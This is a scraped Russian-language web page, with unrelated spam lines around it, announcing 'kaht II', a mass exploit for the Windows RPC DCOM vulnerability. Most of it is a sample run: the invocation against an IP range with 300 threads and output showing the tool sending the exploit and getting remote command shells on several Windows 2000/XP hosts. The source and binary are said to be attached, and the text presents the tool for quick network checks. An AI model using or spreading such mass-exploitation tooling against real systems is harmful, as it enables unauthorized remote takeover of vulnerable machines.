LEFT SIDEBAR PAGE

круизы из Москвы

выпущен многопоточный, многоцелевой эксплоит, эксплуатирующий недавнообнаруженную уязвимость в rpc dcom протоколе в windows системах.работает против большинства версий microsoft windows 2000/xp систем.поддерживает различные макросы. исходный код и откомпилированная win32версия прилагается. код может использоваться для быстрой проверки вашейсети на уязвимость в rpc dcom протоколе. пример работы: example: kaht.exe 10.10.40.0 10.10.255.255 300 _________________________________________________ kaht ii - massive rpc exploit dcom rpc exploit. modified by at4r@3wdesign.es haxorcitos && localhost @efnet ownz you!!! ________________________________________________ [+] targets: 10.10.40.0-10.10.255.255 with 300 threads [+] scan in progress... - connecting to 10.10.40.4 sending exploit to a [win2k] server.... failed - connecting to 10.10.40.9 sending exploit to a [winxp] server.... failed - connecting to 10.10.40.12 sending exploit to a [winxp] server.... failed - connecting to 10.10.40.21 sending exploit to a [winxp] server... - conectando con la shell remota... microsoft windows xp [versi?n 5.1.2600] (c) copyright 1985-2001 microsoft corp. c:windowssystem32>. - connection closed - connecting to 10.10.40.52 sending exploit to a [winxp] server... failed . - connecting to 10.10.40.50 sending exploit to a [win2k] server... - conectando con la shell remota... microsoft windows 2000 [versi?n 5.00.2195] (c) copyright 1985-2000 microsoft corp. c:winntsystem32>exit - connection closed - connecting to 10.10.40.62 sending exploit to a [winxp] server.... failed - connecting to 10.10.40.78 sending exploit to a [win2k] server... - conectando con la shell remota... microsoft windows 2000 [versi?n 5.00.2195] (c) copyright 1985-2000 microsoft corp. c:winntsystem32>. c:winntsystem32>...exit - connection closed - connecting to 10.10.40.105 sending exploit to a [win2k] server... failed - connecting to 10.10.40.97 sending exploit to a [win2k] server... failed - connecting to 10.10.40.116 sending exploit to a [winxp] server... - conectando con la shell remota... microsoft windows xp [versi?n 5.1.2600] (c) copyright 1985-2001 microsoft corp. c:windowssystem32> c:windowssystem32>exit - connection closed - connecting to 10.10.40.129 sending exploit to a [winxp] server... - conectando con la shell remota... microsoft windows xp [versi?n 5.1.2600] (c) copyright 1985-2001 microsoft corp. c:windowssystem32>exit - connection closed - connecting to 10.10.40.128 sending exploit to a [win2k] server... failed - connecting to 10.10.40.151 sending exploit to a [winxp] server... failed - connecting to 10.10.40.163 sending exploit to a [win2k] server... failed - connecting to 10.10.40.166 sending exploit to a [winxp] server... failed - connecting to 10.10.40.168 sending exploit to a [winxp] server.... failed - connecting to 10.10.40.233 sending exploit to a [winxp] server... failed - connecting to 10.10.40.83 sending exploit to a [winxp] server... failed - connecting to 10.10.40.238 sending exploit to a [winxp] server... failed - connecting to 10.10.40.250 sending exploit to a [win2k] server... - conectando con la shell remota... microsoft windows 2000 [versi?n 5.00.2195] (c) copyright 1985-2000 microsoft corp. c:winntsystem32> если у кого есть kaht2.



быстрая индексация сайта поисковиках.